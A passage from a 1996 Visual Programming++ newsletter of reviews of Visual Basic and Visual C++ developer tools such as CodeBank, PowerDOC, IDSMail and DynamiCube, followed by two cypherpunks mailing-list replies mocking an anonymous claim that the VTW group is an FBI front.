each line to let me know right away if I'm using a feature of Visual Basic 4.0
that's not allowed in VB Script.

John Clark Craig is the author of more than a dozen books on computer
programming, including The Microsoft Visual Basic 4.0 Developer's Workshop
(Microsoft Press, 1996). Craig lives with his family in Castle Rock, Colorado.
Email: jccraig@sprynet.com; Web: http://home.sprynet.com/sprynet/jccraig

------------------------------------------------------------------------

CodeBank 

Visual Components, Inc. 
Tel: 913 599-6500 
Fax: 913 599-6597 
http://www.visualcomp.com/ 
Sales@visualcomp.com 
Price: $99.00 
Runtime: not applicable 
Quick Facts: CodeBank makes it easy to store, update and manage Visual Basic 4.0
procedures for individual or multi-programmer development teams.

By David McCarter 
CodeBank is a system for storing re-usable code or for sharing routines with
other developers in your group. Sure, you can create massive, generic modules
that can be attached to every project, but this would waste space in your EXE
and bloat memory requirements. Using CodeBank, you can choose only the subs and
functions your project needs and add them to specific modules. While I think
there are a few kinks that need to be ironed out in this first version, it's off
to a great start. 
	CodeBank includes 163 subs and functions (procedures) ready for use in
your projects. The program displays a list of available procedures organized in
categories in an expandable tree box. Categories include graphic effects, text
effects, status bar control and others. Some of the 163 procedures include
rotate text, gradient background and elastic forms. Simply click on a category
and browse the procedures in it. You can also view procedures by procedure name,
type (sub or function) or author. Clicking on a procedure will show a sample of
how the procedure works in a different window. Double clicking on a routine will
bring up the editing window. By default, you can't edit the canned routines in
order to protect the archive. However, you can make copies of routines
(maintaining all dependencies), then edit them and save them with a different
names. A tabbed form contains all the information for the procedures, including
category name, whether it's a sub or function, description, instructions, code,
sample calls, revision history, and links to API calls or other procedures and
forms need for the procedure. 
	I must warn you that the majority of the stock 163 procedures are
graphically oriented. While this is great for those of you looking for ways of
doing really cool graphic tricks in VB without using a VBX or OCX, I would like
more general-use procedures in CodeBank. However, you can purchase CodeBank to
share code among your development team instead of for the canned procedures. 
	As you find procedures needed in your program, click on an Include button
to add them to a new or existing module file created with CodeBank. These
procedures are listed in a window under the module file name. Of course, you can
also remove these procedures. Consider this window your shopping basket. 
	When you are done selecting procedures, all you have to do is click on
the Make Module button and the module is created in just a few seconds.
Impressively, CodeBank automatically adds any required API calls and procedures.
This beats the copy and paste method hands down! Also, a message box informs you
of any forms you need to add to your project. 
	CodeBank offers an Update All Basic Modules feature for efficient
updating. CodeBank keeps a record of all procedures and API calls added to a
module. So if these procedures are modified at a later date, simply use this
feature to update your modules. It's a snap! 

IRONING OUT THE KINKS 
In my experience, CodeBank has a few kinks that need to be ironed out to make it
a more productive, useful tool. I tested 15 of the procedures that came with the
program, including graphic, form, toolbar and file dialog procedures. I found
one routine that didn't work correctly: UnloadAllForms. It crashed VB because it
did not take into account that it can't be called from a form that is already
being unloaded. Also, most of the procedures are poorly documented. The
beginning of the procedures need better commenting on how to use them and which
parameters to choose. And commenting is displayed on one long line, so I had to
scroll to read the entire comment. This is not a standard commenting practice.
The code itself could use better commenting. 
	There were a few other things that bothered me. I could not maximize the
main program window to view more categories and procedures simultaneously. Also,
code is stored in an Access database. I'm not sure of the reason for this
because it's used as a flat database. Access has a reputation for high memory
overhead (the database of 163 procedures is 622K), and for corrupting in my
experience. I think it'd be better to store routines in a flat ASCII file
system. Also, there seems to be no compression, backup or error checking
features in CodeBank for the Access database. 
	CodeBank comes in both 16- and 32-bit versions. It only creates VB4
modules (though you could translate some of the code to VB 3.0). It can also
import other CodeBank files or a specially tagged ASCII file (I did not have any
samples to test this feature). The program comes with sample projects that show
off a majority of the included routines.

David McCarter is editor and publisher of the electronic newsletter Visual Basic
Tips & Tricks. He works at an interactive television and wagering company, and
has his own software publishing/consulting firm. Contact him at
74777.447@compuserve.com.

------------------------------------------------------------------------

PowerDOC for Visual Basic 

Catapult Systems 
Tel: 800 581-7354 
Tel: 512 328-8181 
Fax: 512 328-0854 (fax) 
http://www.launch.com 
PowerDoc@Launch.COM 
Price $79.00 
Runtime: not applicable 
Quick Facts: Powerdoc automatically creates VB documentation using Microsoft
Word. A demo version is available on the web site, which can be upgraded to full
version via registration.

By Craig M. Bobchin 
If you are a typical developer you probably dread the thought of writing
documentation. And if you have to work on a system written by anyone else, you
may be cursing the lack of documentation. If these scenarios sound familiar, you
may want to check out PowerDOC. 
	PowerDOC works with Microsoft Word 6.0c or 7 to automatically create
technical documentation for VB3 or VB4 apps. It handles third-party custom
controls by default. I tested PowerDOC with Sheridan, Crescent, and Apex and
Farpoint custom controls with no problems. You can set options to document a few
types of controls, such as text boxes and labels, or you can document all
properties of every control in your app. Also, PowerDOC creates screen captures
of forms in black and white, 16- or 256-colors. 
	PowerDoc offers an easy installation with plenty of user control as to
where the program installs, including drive, directory, and program group.
However, you must have VB3 or VB4 on your system before PowerDOC will install. 
	The utility is easy to use. Select the project you want to document,
determine the level of detail by selecting which controls, properties, events,
and modules you want to document, set a few other options, such as where you
want the resulting file to be stored and if you want a table of contents and
index, and PowerDOC does the rest.

SELECTING OPTIONS 
PowerDOC offers a 3-tabbed interface that leads you through the steps for
documenting your application. The first tab, Select Application, lets you select
the VB project you want to document. After selecting the project in the normal
Open File dialog, PowerDOC presents a list of forms and modules to be
documented. You can select as many or as few as you want to document. You can
then sort the items by name or type, or keep them in the order they are in the
project. 
	The next tab, Select Output, lets you choose projects, forms, classes,
and modules. Each selection gives you several check boxes showing which portions
of the objects you can document. Pressing the Advanced button on this tab lets
you select which control types and properties you want to document, as well as
how you want any screen captures stored. 
	I documented an entire application with 14 forms and 3 modules. The app
had approximately 100 controls and about 5,000 lines of code. I documented all
controls and objects, and the resulting Word document was 374 pages. You can
customize the scope and size of your documentation by either not documenting the
entire system, or by selecting which pages you want to print. 
	The last tab, Customize Word, lets you customize Word options and
settings, such as generating a table of contents and index, and determining
their style.

MINOR ANNOYANCES 
When you press the Document button, PowerDOC launches VB with your application
loaded. Documenting a VB4 app works fine. However if you try to document a VB3
project using VB4, a message states that you must first save the project in VB4
format before you can run PowerDOC. If you have both VB3 and VB4, you can
specify which version of VB you want to use. 
	The second minor glitch shows up if you already have Word open. In this
case you get a message asking you to close Word and try documenting again. 
	Performance is adequate: it took about 20 minutes on my P90 with 24 MB of
RAM to document my test application. Your time will vary based on the size of
your application, the level of detail you want and the power of your machine. 
	PowerDOC comes with a 30 page manual that assumes you have the knowledge
to install the product. The manual does a good job of explaining the program and
how to use it. The manual covers topics ranging from a step-by-step tutorial to
a trouble shooting guide of frequently asked questions (FAQ). The help file is
similar to the manual in scope and content. 
	Overall, I like PowerDOC. It does what it is supposed to with a minimum
amount of fuss. I expect that most developers can live with the minor annoyances
I described. I say get this program if you need to document your Visual Basic
applications.

Craig Bobchin is president and founder of CMB Systems Design, a microcomputer
consulting firm specializing in application development and training. He has
written more than 150 articles and Powerpoint 4.0 for Windows QuickStart (Que).
Cbobchin@aol.com or 102142,3336@CompuServe.com. 

------------------------------------------------------------------------

IDSMail 2.1 

Intuitive Data Solutions 
Tel: 408 778-1376 
Fax: 408 776-1267 
http://www.kudonet.com/~ids 
ids@kudonet.com 
Price: Standard Edition: $295 (send mail only), Professional Edition: $495 
(send and receive mail) 
Size: 460K (total for all DLLs for all mail systems) 
Runtime: licensing required only when distributing more than 100 copies external
to your company. 
Quick Facts: An OLE Server that supports major E-mail protocols and provides
e-mail services under any version of Windows for any tool that supports OLE
automation. Download sample code: http://www.kudonet.com/~ids/idsmprog.htm. 

By Peter Vogel 
Electronic mail is becoming a necessity rather than an option. IDSMail lets your
apps send and receive mail using any version of Windows across four mail
systems: MAPI, VIM, MHS, and Vines. You can even download a VB program from the
company's website showing how IDSMail makes your mail system accessible from the
Internet (though the package does not support the Internet mail protocols: POP3
and SMTP). 
	If VB's MAPI control satisfies your email requirements, you don't need
IDSMail. However, if you must support multiple types of systems (MAPI, VIM, MHS
and Vines), or you want to extend the mail capabilities of Excel and Access
under Windows 3.1, then I recommend IDSMAIL. 
	IDSMail comes as a 16-bit OLE server, hence it works with any tool that
supports OLE Automation under Windows 3.1 or Windows 95. I had no problems
installing IDSMail on either version of Windows. Ten minutes after starting up
VB4 and copying some code from the help file, I had a mail application running.
The brief Windows help file is the only documentation provided; it seems
complete and I found only a few minor inaccuracies (some VB3 code labeled as
VB4, for instance). The help file and additional sample code can be downloaded
from the IDS website. IDSMail used only 2% to 3% of my system's resources when
running, but while the documentation doesn't indicate it, I found I didn't get
all of those resources back unless I set my program's reference for IDSMail to
Nothing after use. Performance was acceptable even on a 33mz 486 with 16MB of
RAM with Excel 5.0 using the server and Access 2.0 or Word 6.0 loaded.

WEIGHING THE PROS & CONS 
The product has some neat extensions to MAPI: you can specify how many messages
you want to retrieve, prevent attachments from being copied to your disk, build
an array of message headers or text for search purposes, and read messages
without flagging them as having been read. On the other hand, compared to VB's
MAPI controls, you give up some things. These include single methods for
forwarding, copying, and replying to messages, the ability to customize the
address book dialog, and message types. While I found some activities (notably
logging in) simpler, some activities (like reviewing the recipients list) were
more awkward. Obviously, in providing a universal mail server, IDS had to decide
which features they were willing to support across all protocols. Even so, not
all of IDSMail's functionality is available for all mail systems. There are
dozens of properties and methods supported by IDS across different systems, and
sorting through which functions are supported on which systems is beyond the
scope and length of this review. 
	If portability matters to you, you'll want to review the help file's
Implementing Truly Universal Email topic. Most of the recommendations are made
to ensure consistency as you move from one mail system to another. For instance,
IDS suggests that you always use IDSMail's Mail Send dialog, though this means
losing the functionality of the native dialogs provided with VIM and MAPI. IDS
also recommends not using folders because they are not supported under MAPI, and
using PeekOnly is discouraged because it isn't supported by MHS. While these are
all useful tips, their recommendation to not use the NameResolution property is
not a good idea if you might be working with a MAPI compliant system. 
	If you follow the advice to leave NameResolution set to false, you'll
encounter a problem with users whose display names are similar under MAPI. MAPI
considers Jane Smith to be an ambiguous name compared to Jane Smith-Jones, and
it won't send mail to the display name Jane Smith. You can use the ResolveName
action to retrieve Jane Smith's unique mail address to solve this problem with
the MAPI VBX. Unfortunately, IDSMail's ResolveName method just returns the still
ambiguous display name. Setting IDSMail's NameResolution property to True,
however, solves the problem. Because theNameResolution property is ignored under
the other systems IDSMail supports, there seems to be no reason not to leave it
set to True, contrary to IDS's recommendation. Another solution would be to use
each user's unique mail address, but there isn't any way to get those with
IDSMail. 
	I called the company's technical department with a question just before
5:00PM IDS time and left a message. I also sent in a request for support using
the IDSMail server on the company's website. I got a response to my mail request
in a few hours and heard back about my phone request the next business day. 
	Each IDSMail server has a unique license file that provides the objectkey
your program must pass to the server before use. You'll want to make sure that
you have only one license file in circulation no matter how many development
licenses you buy. 
	There's definitely a niche for ISDMail, even if you are only using a MAPI
compliant mail system. If you want to receive mail from within Access 2.0 or
Excel 5.0, or if you want to send a non-Access attachment from within Access
2.0, you should consider IDSMail-the alternative is having to code the MAPI
calls yourself. If you don't use a MAPI compliant system and you want any mail
functions at all, IDSMail will let you mail-enable your applications. 
	Finally, if you may be changing mail systems, IDSMail will save you from
rewriting your code as part of the changeover. While not everyone will need
IDSMail, those who do will be glad to have it.

Peter Vogel is the applications supervisor at Champion Road Machinery and a
Microsoft Certified Solution Developer. Reach him at peter.vogel@odyssey.on.ca 

------------------------------------------------------------------------

Total Access Agent 1.02 

FMS, Inc. 
Tel: 703 356-4700 
Fax: 703 448-3861 
http://www.fmsinc.com 
Price: single copy: $199; five-pack: $599 
Size: 1.7MB 
Runtime: not applicable 
QuickFacts: Total Access Agent is a maintenance scheduling utility for Microsoft
Access/Jet databases. It performs routine tasks such as compacting and repairing
databases, gathering statistics, and archiving tables or whole databases in both
16- and 32-bit versions.

By Don Kiely 
Total Access Agent automates the drudgery of maintaining and archiving Jet
databases. It works with all versions of Jet .MDB database files, so you can use
it with VB and all Access releases. The product is a program scheduler tailored
for easy maintenance of Access databases. It includes several standard,
pre-configured actions: archive a database, archive table data, compact and/or
repair a database, gather statistics about database objects and execute named
macros. It also includes a custom command option that lets you run any command
line. Archiving table data is a nice touch, because macros, forms, reports, and
code can take up a lot of disk space but rarely change, so why back them up
hourly? 
	Total Access Agent consist of three components: the Manager, Monitor, and
Engine. You use the Manager to maintain actions, such as to add and remove
databases, schedule events, and specify network passwords. The Monitor runs
continuously and launches the action at the scheduled time. Finally, the Engine
is the backend that runs everything-it has an OLE interface so you can launch
events programmatically. 
	Total Access Agent can schedule hourly, daily, weekly, and monthly
events. The hourly and daily intervals had all the flexibility I needed, but I
would like to see more options for the weekly and monthly intervals. For
example, you can select the particular days of the week to run an event, but you
can only run monthly events on a particular day of the month, such as the 15th.
It would be useful to run something on the third Thursday of the month or every
other week without creating multiple, duplicate actions. 
	The utility has some slick scheduling features. I was impressed with how
it manages database files. Once you add a particular file to an event, it is
added to a master database list, no matter how many actions use it. That means
that if you change a single database file that is used in 15 Total Access Agent
actions, you only have to change one setting in one place. This is just one
benefit of a well-defined and consistent user interface that belies the work
that went into planning the product. 

DOING THE TESTING 
I set up the program on Windows NT 3.51 and 95 machines connected on an NT
Server network to put Total Access Agent through its paces. I used two large
Access databases for testing and performed just about every available event as
frequently as possible. Once I got everything set up properly, the program
performed flawlessly, repeatedly backing up the databases and gathering
statistics. 
	Some impressive features include automatically emailing a message when an
error occurs, copying whole groups of events so you don't have to recreate them
by hand, and suspending an event so that you don't have to delete and then
recreate it. It even includes a Test button so you can immediately test any
scheduled action to make sure that you've set it up correctly. FMS did a nice
job with these extra touches. 
	The 73-page manual is well-written, concise, clear, and indexed. It has
almost too much detail, but this is a testimony to the quality of product design
rather than a flaw in the manual. The Windows help file contains the same
material as the manual--another nice touch. The documentation is careful to
point out the program's limitations, such as to caution you that Total Access
Agent uses the Jet engine's database repair capabilities, so don't expect
miracles if Access itself can't fix a file. Total Access Agent includes both 16-
and 32-bit versions, so it runs under Windows 3.x, 95, and NT using all Jet
database versions.

WINDOWS NT GOTCHA 
I did encounter a minor problem with Total Access Agent on my Windows NT 3.51
SP4 development machine. Total Access Agent Manager ran fine, as did Monitor,
but I got an OLE error any time the Engine tried to perform an action. Technical
Support via email and phone was helpful and responsive, and we ultimately solved
the problem: the server wasn't registering properly--a typical NT problem. The
product worked great on Windows 95. 
	Besides this small problem with the Windows NT installation, there are a
few minor improvements I'd like to see. There isn't always a list presented to
the user when it would make sense, such as when you enter the name of an
existing macro in the database you want to schedule. It would be easy enough to
get a list of macros; the utility does present a list of tables to archive. If
you change the scheduled events in Manager, you have to remember to either
restart Monitor or click the Refresh Event Schedule button for the changes to
take effect. I'd prefer having an option for the schedule to refresh itself at a
specified interval, because this could easily be overlooked. 
	My first impression on learning about Total Access Agent was, why bother?
Access itself can do all the maintenance chores that Total Access Agent handles,
and a simple program scheduler will run them. But it would take you a long time
to match Total Access Agent's ease of use and elegance. So if you have Access
databases to maintain, I'd definitely suggest you consider Total Access Agent.

Don Kiely is Development Manager for the Arctic Development Council on the North
Slope of Alaska. He programs in VB and writes about it when he isn't chasing
polar bears. He's written several books about VB and VC++, including Visual
Basic 4 Database How-To (co-author) from Waite Group Press and the Ultimate VB 4
Controls Sourcebook from Coriolis Group Books. Reach him at
donkiely@polarnet.com or 72657.475@CompuServe.com.

------------------------------------------------------------------------

DynamiCube 1.31 

Data Dynamics, Ltd. 
Tel: 614 895-3142 
Fax: 614 899-2943 
72672.550@compuserve.com 
http://www.datadynamics.com 
ferhat@coil.com 
Size: 1.2 MB 
Runtime: not applicable 
Price: $499 
Quick Facts: DynamiCube is a 32-bit data-bound ActiveX custom control for
On-Line Analytical Processing (OLAP). Supports VB4 32-bit Professional and
Enterprise Editions, or other 32-bit ActiveX compatible development tools.
Downloadable demo. Requires Windows 95 or Windows NT compatible PC, 3 MB HD, 8
MB RAM (16 recommended). 

By Jeff Borgoff 
With corporate America embracing On-Line Analytical Processing (OLAP), Data
Dynamics, Ltd. has thrown its hat in the ring with DynamiCube, an ActiveX custom
control that allows VB4 developers to build OLAP capability into executive
information systems (EIS) and decision support systems (DSS). DynamiCube
delivers custom n!-multidimensional data analysis capability, where the
dimensions are limited only by system resources. To give you a better idea of
the concept of dimensions, consider this: you want to see your company's total
sales by product, category, country, region, quarter and year. The quarter,
category and product constitute your columns, the region, country and year make
up the rows, and the sum of sales is presented as your data. The result is six
dimensions of data--or 6! 
	A market saturation of first tier OLAP tools with OLE Automation support
may make it difficult for Data Dynamics to position DynamiCube as a enterprise
solution for OLAP. I'm familiar with other OLAP tools, but they're all larger
and more expensive than DynamiCube. I see DynamiCube best suited for
small-business, departmentalized or small commercial-product development where
the fat competitive products aren't suitable due to size and cost. 
	DynamiCube's claim to fame is its small foot-print (less than a megabyte
for distribution), fast processing (assisted by Win32), impressive built-in
print engine with print preview, OLE Automation support and slick presentation
of data with drill-down capability. The product does its number-crunching on the
client-side using the Microsoft Jet engine (DAO and RDO) and ODBC data sources.
This works well enough if your clients have powerful machines, but this could be
a problem with the client-side processing of massive amounts of data that would
be processed faster on a server. DynamiCube also binds to the Visual Basic Data
Control, Remote Data Control or directly to a data source without the Data
Control. As long as clients have adequate resources, DynamiCube retrieves,
crunches and displays huge amounts of data. The vendor recommends a Pentium 100+
MHz processor with 24 to 32 MB RAM for the power user of heavy DynamiCube
applications. Data Dynamics provided me with a formula for virtual memory
consumption of a Cube in action:

((Number of Dimensions * 4 bytes) + ( Number of Data Items * 8 bytes)) * (The
Summarized Number of Records)

For example:

((6 * 4) + ( 2 * 8)) * (10,000) = 3,840,000 bytes consumed.

TESTING PROPERTIES
DynamiCube's interface is developer friendly. The grid-layout properties page is
robust, with an ample amount of customization ability comparable to capabilities
offered by third-party grid controls. The properties page uses drag-and-drop to
setup the data views. 
	Notable property features include the dcConnect, dcConnectType,
dcDatabaseName, dcOptions, dcQueryTimeout and dcRecordSource. These built-in
DynamiCube replacement properties for the VB Data Control allow direct support
for DAO, RDO and ODBC. I tested DynamiCube's connection to a Visual Basic Data
Control compared with a direct connection using DynamiCube's built-in connection
properties, and found performance about the same for each approach. However,
there are a couple of benefits for using the built-in connection properties for
DAO, RDO and ODBC. First, you don't have to deliver the Visual Basic Data
Control with your application; secondly, you don't have to write any code using
DynamiCube's built-in connection properties. 
	DynamiCube's obvious weaknesses are its lack of support for Windows 3.1
(no 16-bit ActiveX version) and no integrated charting. Data Dynamics obviously
chose to go with a 32-bit version because of the added power for processing
large amounts of data, but if your users are running 16-bit systems, you're out
of luck. The single sample project that comes with DynamiCube demonstrates a
charting method using Visual Basic's anemic charting control--not exactly EIS
presentation quality. However, you can export data to Excel using OLE
Automation. 
	The good news is DynamiCube has a few runtime properties that make it
fairly simple to populate any chart control on the market. The sample
application demonstrates all of DynamiCube's features (if you work through
everything). I couldn't find some features in the manual or help file (e.g. the
"PerformanceDlg" method), however PerformanceDlg was demonstrated in the sample
app. I would prefer to have Data Dynamics spell out everything in the
documentation. I encountered some problems using DynamiCube's on-line help file,
such as properties missing from the properties list, and keywords not found
during a context-sensitive search. I had to reference the 90 page manual more
than I usually do for a custom control. Also, the manual has a two-page guided
tour with some documentation errors that prompted me to call the vendor. They
noted the errors and will hopefully make corrections for subsequent releases. 
	If you want to see a cool example of how Data Dynamics' ActiveX
DynamiCube works on the web, download Microsoft Internet Explorer 3 (beta as of
early July) and go to http://www.datadynamics.com. You'll find an excellent
demo. 
	In spite of the documentation shortcomings, if you're looking to add OLAP
capability to departmental or small-business EIS or DSS applications using
client-side processing, DynamiCube is worth a look.

Jeff Borghoff is the founder and President of Avalon Logic, Inc. He is a
Microsoft Certified Professional and Visual Basic Product Specialist. His New
Jersey based firm specializes in the design and development of Microsoft Windows
based client/server systems. Reach him at AVALON_LOGIC@msn.com. 

------------------------------------------------------------------------

VB Compress Pro 4.03 

WhippleWare 
Tel: 617 242-2511 
Fax: 617 241-8496 
BBS: 617 241-9284 
Price: $100 
Runtime: not applicable 
Quick Facts: VB Compress Pro 4.03 automatically deletes unused or un-referenced
code. It generates reports, regenerated code, or both. Supports VB2, VB3, VB4-16
and VB4-32.

By Bill Shadish 
Many VB projects accumulate unused code over time. For example, code is orphaned
when you delete a control on a form and forget to delete any corresponding event
code for that control. VB Compress ferrets out any un-referenced code and
deletes it. I must admit, VB Compress is one of the tools I hoped would make the
treacherous journey from VB3 to VB4 with me. And it has, with release 4.03
offering significant improvements. 
	VB CompressPro 4.03 (VBC4) searches your projects' source files for
un-referenced API calls (declarations), unused variables and constants, unused
subs, functions or property procedures and un-referenced controls or other
external references. Selecting appropriate options configures the utility to
automatically delete unwanted code. 
	This latest release offers improvements over version 3, including: 

* Server mode checks that allow you to compress automation server code. 
* Intelligent checking of public references so that dynamically loaded routines
are preserved. 
* Long file name support for use on Win95. 
* The ability to place C++-like assertions in your VB code to perform actions in
case of unexpected errors. 
* Speed improvement of 30-40%.

	This new release requires less puttering around with options than VBC3
demanded. You can rewrite project code after reviewing a brief informational
screen. Moving between options and reports lets you control the level of detail
to code changes. Also, many options are provided to control which of these
unwanted impurities are actually removed from the final rewritten code.

GENERATING REPORTS
I ran VBC4 against a 5070 line, 12 file, OLE Server project. VBC4 quickly
produced an informational analysis, showing referenced and un-referenced
controls, and references to outside DLLs and EXEs. Also included were missing
external references that show up as unresolved. The utility also produced a list
of file facts, including the oldest file, largest file, file sizes, byte counts
and other types of files. I received a file-by-file analysis featuring the
number of comments, blanks, executable code, variable declarations, form
definitions and in-line counts that make up each file. 
	I analyzed the code, generated a report and produced source code.
Analyzing the 5070 line server took 1 minute, 39 seconds on a 486-33 with 16MB
of RAM (the slowest machine that I could find). 
	The Analysis Report step told me which constants, variables, and routines
(sub, function and property) are un-referenced (that means unused) in my
program. I also received an analysis of external objects I had left
un-referenced. The analysis even included unused labels, such as unused error
handlers. Armed with this information, I analyzed my code manually to see why
variables or routines were un-referenced. This is a great tool for
double-checking your code to see if something was forgotten or unfinished. I let
VBC4 automatically produce an updated version of my code, dropping the
un-referenced items. 
	The VBC4 report also shows any unused API declarations so they can be
deleted as well. API calls take up a fair amount of space within VB, because the
string itself must be allocated, along with enough space to hold and resolve the
parameters passed through the API call. Removing unused declarations can save
quite a bit of memory if you have a large number of un-referenced API
calls--possibly duplicated across several modules. 
	The report is generated as a text file. VBC4 provides a viewer (VBC
Viewer) that formats this file for viewing. You can drill down into further
detail in some areas marked "click-here" to see more information about the items
marked. And you can change report options to produce more or less of a
breakdown. For example, you can select options to show all control events that
have had code written behind them--a rather handy reference guide. You can print
the report from the VBC Viewer, but WhippleWare left out the ability to copy,
cut and paste the information directly from the on-screen report. Hence, you
can't easily export the statistics into other tools, such as Excel.

CODE GENERATION 
VBC4 offers quite a bit of control for handling code generation. For example,
you can change options to have unused files deleted when the code is
regenerated. You can also remove unused control objects from your project (which
means I don't have to remember to remove control objects prior to creating
install disks!). You have the ability to comment out, remove, ignore, mark or
interactively decide how to handle the un-referenced local, private or public
items. These items include constants, variables, type declarations, declarations
or procedures. 
	Lastly, VBC4 loads VB.EXE under its control and runs the VB design
environment. You are able to interrupt the code generation process using a VBC4
toolbar that appears within VB. Using this same toolbar, you can generate a new
.EXE and decide whether to update the VB source files or not. 
	The one glitch I found working with VBC4 was running out of memory while
producing updated code (for code procedures or declaration sections approaching
64K). This type of problem is often due to limitations within VB's editor
itself. 
	In case you couldn't tell by now, I like this product.

Bill Shadish is a principal of Fundamental Objects, Inc., where he works with
ActiveX controls and OLE server technology. He teaches VB programming, and
writes regularly for VBTech and Visual Basic Developer. He co-authored the book
Using OLE In Visual Basic 4, (Pinnacle Publishing, Inc.). Reach him at
bills@fo.com or at http://www.fo.com. 

------------------------------------------------------------------------

Visual SQL 4.0 

Blue Sky Software Corporation 
Tel: 619 459-6365 
Fax: 619 551-2486 
http://www.blue-sky.com/ 
Price: $1899 
QuickFacts: Visual SQL 4.0 is a code generator and class library that turns
Microsoft Visual C++ into a client/server development environment. Supports
32-bit VC++ 4.0, Windows 95 and Windows NT.

By Steve Jackson 
Visual SQL is a code generator and class library that creates 32-bit
client/server database applications using Visual C++ 4.0 and the Microsoft
Foundation Classes. It requires Windows 95 or Windows NT, and comes bundled with
Sybase SQL Anywhere. The main benefit of Visual SQL is that it saves the time
otherwise necessary coding screens and creating code to move data to and from
the edit controls. The developer starts up the Visual SQL application generator
wizard, selects the ODBC data source, tables, and columns needed for the
application, and Visual SQL generates all the Visual C++ code needed for a fully
functioning MFC database application. You can use any database with a 32-bit
ODBC database driver. Visual SQL and the code it creates are fully integrated
into the Visual C++ Developer Studio IDE. No runtime DLL is needed other than
the standard ODBC DLLs. The product includes some useful utility programs and a
repository that can be used optionally to store queries. The repository can be
used in a team environment to share queries among multiple developers. 
	I put the Visual SQL application wizard to the test by creating a
customer order-entry database update program. Creating update screens was
easy--I chose the table and columns, and they appeared on the form. The wizard
created the update screens automatically, with edit controls for each field and
the field name placed as a label above each edit control. I was then able to
visually modify the form by dragging fields around and clicking on labels to
change text. The wizard gives you some choices for how to do database retrieval
and how the screens appear. Database retrieval can be done for an entire table,
for SQL statements you create, or using a query stored in the Visual SQL
Repository. Screens can appear as a data sheet with multiple records per screen
like a spreadsheet, or as a data screen with one record showing at a time. Menu
choices and toolbar buttons are automatically generated with navigation commands
(first, next, and last record) and update commands. The code generated by the
wizard compiled and ran cleanly the first time without any errors or warnings.

SEAMLESS INTEGRATION
I found the code generated with Visual SQL to be well written and well
integrated with the MFC document/view architecture. I have seen other code
generators that require the programmer to stay within the code generator IDE for
all compiles, with limited ability to modify the program code. I was quite
pleased to discover that Visual SQL creates an entire MFC project that can be
compiled and modified with the Visual C++ IDE. I easily set debug breakpoints
and ran the code from the Visual C++ debugger, and was able to modify the code
using Visual C++ class wizards. Using the MFC Class Wizard, I added code to the
undo menu items to cancel database changes made to a record. Oddly, the Visual
SQL wizard generated menu selections for this, but failed to generate any code
behind the menu choices. 
	Looking under the hood, I found that the database operations were carried
out in a Visual SQL class library. This library consists of classes that are
wrappers around standard MFC data access objects (DAO) using dynasets and
snapshots. Because the MFC DAO classes are built on top of the ODBC API, a
developer can add calls directly to the ODBC API if needed. 
	The product comes with a suite of useful utility programs. The Database
Explorer allows the developer to view database table structures, analyze ODBC
connections, and view repository entries. The ODBC Data Source tester and
Configuration tester can be distributed with applications generated by Visual
SQL. These testers verify that ODBC data sources are installed correctly, and
that a user has the right versions of all the required DLLs; this information is
highly useful for debugging an application, and for remote telephone support.
The Visual Query builder presents a graphical interface for creating database
queries and SQL statements, saving the developer time spent looking up column
names and SQL syntax. 
	Installation went smoothly, and the setup program automatically
configured an ODBC data source for the tutorial programs. The documentation is
well written and complete. For example, the documentation includes a detailed
description of all the generated code modules, what each routine does, and how
the modules are named. A few potential improvements I'd like to see in future
releases include: the ability to automatically generate undo code to allow a
user to cancel updates on a data screen, transaction commit point processing, a
report generator and the ability to store labels in the repository instead of
using field names when creating data screens. 
	Blue Sky maintains a web site at http://www.blue-sky.com. Be sure to
include the dash in blue-sky in the web address--if you leave it out you will
find the web site for another company also called Blue Sky!

Steve Jackson develops network-based applications using VB, C, SQL Server,
Oracle and other tools at Loral Aeronutronic in Southern California. Steve is a
Visual Basic Programmer's Journal author and CompuServe section leader:
72040.1640@compuserve.com.

------------------------------------------------------------------------

To subscribe to Visual Programming++, send an e-mail to
visualprog-request@scribe.cerf.net. Include the word "subscribe", space, your
e-mail address in the body of the message. For example, subscribe
yourname@youraddress.com. To cancel your subscription, include the word
"unsubscribe", space, yourmailaddress and send the same request. VP++ is
separate from Hot Links, a brief e-mail sent to registered users of DevX
alerting them to interesting new items on the site, and industry news.

ABOUT FAWCETTE TECHNICAL PUBLICATIONS 
Visual Programming++ is Published by Fawcette Technical Publications. Copyright
(c) 1996 Visual Programming++. All rights reserved. FTP also publishes or
produces: Visual Basic Programmer's Journal, Avatar: http://www.avatarmag.com,
Microsoft Interactive Developer, VBITS conferences, The VBCD, The VBPJ Guide to
VB4, VBPJ CompuServe forum (GO VBPJ). 
Fawcette Technical Publications 
Publisher/President: Jim Fawcette 
209 Hamilton Avenue 
Palo Alto, CA 94301-2500 
USA 
Editorial Offices. Tel: 415-833-7100 
Editorial Offices. Fax: 415-853-0230 
Customer service and subscriptions: 303-541-0610 
Orders: 800-848-5523 or 415-833-7100





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 23 Jul 1996 12:11:30 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: the VTW---FBI Connection
In-Reply-To: <199607221607.MAA12381@jekyll.piermont.com>
Message-ID: <199607222035.QAA00928@nrk.com>
MIME-Version: 1.0
Content-Type: text


 > I) They appear to have no financial support or funding source. They
 > do not accept donations. They have no corporate funds. And yet they
 > appear to be a thriving business.

They make millions of bits per month! And I bet they pay taxes on
nary a one. Call the IRS!

 > IIII) We didn't believe this without external verification. So we called
 > the Brooklyn office of the FBI and asked for Agent Safdar. No such person.
 > I called the Washington office. No such person. Checked if there is
 > any agent named Safdar. They don't give out this info.
 
Shibbir could never cut it as a Fed  -- his suit is not bland enough
& his hair is too long.

 > No driver's license in NY, DC, NJ, etc.

A NYC native like Shibbir driving? THAT would be a threat to
National Security. Why do you think we locked 'em all up on
that island, anyhow?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 23 Jul 1996 16:20:06 +0800
To: cypherpunks@toad.com
Subject: Re: the VTW---FBI Connection
Message-ID: <199607222339.QAA18325@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> responded to a nut case:
> Anonymous writes:
> > We have received information that VTW is run and supported by the FBI,
> > which we have suspected for reasons listed here.
> 
> You are out of your mind.

What is more, in my case, it doesn't matter.  My feelings on the subject of
